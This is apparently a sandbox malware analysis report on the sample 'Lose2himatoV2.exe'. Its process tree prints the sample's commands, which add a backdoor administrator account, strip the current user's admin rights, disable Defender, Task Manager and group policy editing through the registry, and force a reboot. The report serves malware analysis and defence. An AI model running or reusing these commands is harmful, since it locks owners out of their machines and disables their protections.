Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

02/02/2025, 18:09

250202-wrrfsatjdv 9

07/01/2025, 19:34

250107-yacbmsxlan 9

Analysis

  • max time kernel
    45s
  • max time network
    47s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07/01/2025, 19:34

General

  • Target

    Lose2himatoV2.exe

  • Size

    138.5MB

  • MD5

    b13b58171063faf469d7cffd178644a6

  • SHA1

    0cc178b5db25710be4181e0f15b70ca8c3049ef2

  • SHA256

    974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506

  • SHA512

    511d96d59fc5646aead6f0bf16ecbe9f9e1ab60e05954b02d2b53c7686df2ccfe85374388fc5aece04e50bd37ff3411319c7107d52cc33c3af819fb47ab570e3

  • SSDEEP

    786432:Y93oFjO6NbbB6uTE/kbsV0jmB/gWD4otJ0njnEMIQAhpLoMS/QVQfmLh0VPdTtLH:Y9SjOsbbUng40ihpEX/QVQfmLmxHXutU

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Disables Task Manager via registry modification
  • Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Detected potential entity reuse from brand PAYPAL.
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe
    "C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:276
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user Lose2himato /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:908
      • C:\Windows\SysWOW64\net.exe
        net user Lose2himato /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4752
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Lose2himato /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5080
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Windows\SysWOW64\net.exe
        net user Lose2himato dumbass
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Lose2himato dumbass
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1556
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4308
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "Lose2himato" /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4240
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
      2⤵
      • Indicator Removal: Network Share Connection Removal
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4820
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "Admin" /delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4808
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3848
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1700
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2428
    • C:\Windows\SysWOW64\explorer.exe
      "explorer.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:3148
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4804
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1228
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2832
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:804
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:644
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1636
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:760
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4212
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2712
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe07a93cb8,0x7ffe07a93cc8,0x7ffe07a93cd8
          4⤵
            PID:3940
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
            4⤵
              PID:1124
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1748
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
              4⤵
                PID:2284
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                4⤵
                  PID:1092
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                  4⤵
                    PID:1444
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:1
                    4⤵
                      PID:2832
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
                      4⤵
                        PID:760
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
                        4⤵
                          PID:4440
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
                          4⤵
                            PID:3756
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3804 /prefetch:8
                            4⤵
                              PID:1556
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3872 /prefetch:8
                              4⤵
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1584
                            • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6872 /prefetch:8
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5416
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6752 /prefetch:8
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4016
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
                              4⤵
                                PID:5688
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1
                                4⤵
                                  PID:2316
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:1
                                  4⤵
                                    PID:4836
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
                                    4⤵
                                      PID:4012
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,3304977351295030328,684256224943842398,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
                                      4⤵
                                        PID:3088
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3856
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck
                                      3⤵
                                        PID:1904
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffe07a93cb8,0x7ffe07a93cc8,0x7ffe07a93cd8
                                          4⤵
                                            PID:1036
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,14947961560783498871,6265491253513641836,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1984 /prefetch:2
                                            4⤵
                                              PID:2488
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,14947961560783498871,6265491253513641836,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:3
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:916
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato666
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2756
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato666
                                            3⤵
                                              PID:4076
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe07a93cb8,0x7ffe07a93cc8,0x7ffe07a93cd8
                                                4⤵
                                                  PID:984
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,14744789126568575932,15089754650754166986,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:2
                                                  4⤵
                                                    PID:5080
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,14744789126568575932,15089754650754166986,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3516
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c shutdown /r
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5444
                                                • C:\Windows\SysWOW64\shutdown.exe
                                                  shutdown /r
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5532
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:1592
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:3760
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:4480
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:1172
                                                    • C:\Windows\System32\PickerHost.exe
                                                      C:\Windows\System32\PickerHost.exe -Embedding
                                                      1⤵
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3472

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      051a939f60dced99602add88b5b71f58

                                                      SHA1

                                                      a71acd61be911ff6ff7e5a9e5965597c8c7c0765

                                                      SHA256

                                                      2cff121889a0a77f49cdc4564bdd1320cf588c9dcd36012dbc3669cf73015d10

                                                      SHA512

                                                      a9c72ed43b895089a9e036aba6da96213fedd2f05f0a69ae8d1fa07851ac8263e58af86c7103ce4b4f9cfe92f9c9d0a46085c066a54ce825ef53505fdb988d1f

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      003b92b33b2eb97e6c1a0929121829b8

                                                      SHA1

                                                      6f18e96c7a2e07fb5a80acb3c9916748fd48827a

                                                      SHA256

                                                      8001f251d5932a62bfe17b0ba3686ce255ecf9adb95a06ecb954faa096be3e54

                                                      SHA512

                                                      18005c6c07475e6dd1ec310fe511353381cf0f15d086cf20dc6ed8825c872944185c767f80306e56fec9380804933aa37a8f12c720398b4b3b42cb216b41cf77

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\213a3a0f-19dd-49c6-8597-942355aaa7bb.tmp

                                                      Filesize

                                                      5KB

                                                      MD5

                                                      4f1ece69943f736e0296ad2e1a3def43

                                                      SHA1

                                                      1df1dcac4edb71dbb639e821c57f22bafe7a4095

                                                      SHA256

                                                      67f001abb6195482528d1a0c9e9d3f013d88f344ef64cfceefb9dd7a33396e56

                                                      SHA512

                                                      709c128cdc7926b59f3189eb2624659e265e337e26f2b516313c426a7bef5b44271f105aa9be56d8a5a781f424711e7d0f02603f46186ac796b6ead382884b28

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                      Filesize

                                                      4KB

                                                      MD5

                                                      1dc266d76e413b7a8faa0d10bcc553c7

                                                      SHA1

                                                      4e912242fb21e918061fd02f6de7c683aab4dbaf

                                                      SHA256

                                                      38e31727bead5682c01d909f1e07ee7737335ac9400da5b96b21dced92613455

                                                      SHA512

                                                      6937d11f94a578957b26cb25f3c6f0e9f27219da197fde9283f274ebb45287de7c63b315bdf04eb7a80e6097eb132925d30e67a5282df0da8645d23f1986b092

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      28761d60c2b57cd6c0f2206ab63b48e8

                                                      SHA1

                                                      714f8fbe46076463139459c84be82b37fff8e8b2

                                                      SHA256

                                                      b2fe8db1f4a0295e3d08b96140cffb330704f03e47b2bdc3b02021a7955be3aa

                                                      SHA512

                                                      0b98a96422a1fee5353f552a7a89bb4b42b04f4df7b8db4943f3447b066d3db2430528b6f516fc31f8067224f32f87df32cec6e71009bc0386157de0c82e6502

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      d11819801275f8b62e2ef3b9498d9064

                                                      SHA1

                                                      6074140a1f37f1a431a8adeee4d25937e5d30d26

                                                      SHA256

                                                      4265a9d11800f6b13cac3ba2f311c2f70f00207608cede2988f1af7d7a63b902

                                                      SHA512

                                                      3a1e83b635bc7b78370bce3d35d383dcc9c78d9889b1315f845290545b742f742a26c2aff77a344bc0e9c595afb726a3426575ab1da96997870b6f9e65f82eb1

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      7d8ab301dd8a98fc6d96ba9e79b489d6

                                                      SHA1

                                                      307b7a439ab718f1c15eab69c436a1f0f66c3253

                                                      SHA256

                                                      41fa9bdd524f46c790d74cb27614d3e256b703369b5a8de13b1b12b0e7c133ae

                                                      SHA512

                                                      8c2c2b386f0238704e03e7a748dbc7fff8163f2dab6be9ebd5d4f9229b14ce9cefe5b3e34d425a4135b56fa38f7ab1b5a30fec70700c508b2d4fe4a9eaf51f32

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5817f8.TMP

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      466e09f5594b5460b6123ce36ea1c334

                                                      SHA1

                                                      141d6321819ae7a6ae40498b3be741e379f31ca0

                                                      SHA256

                                                      72a013d73d4e683f103640a1101c3e1cd945590a97f0b408f44932823de754a8

                                                      SHA512

                                                      29957695542bf264c46699e98c76537cbc9c89a77c6feeef40a432fbbe1c84b26bdee11ed474aa4e4f9cc02f94abaeb095cecb8f1d943ab54887098baad1354c

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                      Filesize

                                                      16B

                                                      MD5

                                                      6752a1d65b201c13b62ea44016eb221f

                                                      SHA1

                                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                      SHA256

                                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                      SHA512

                                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                      Filesize

                                                      8KB

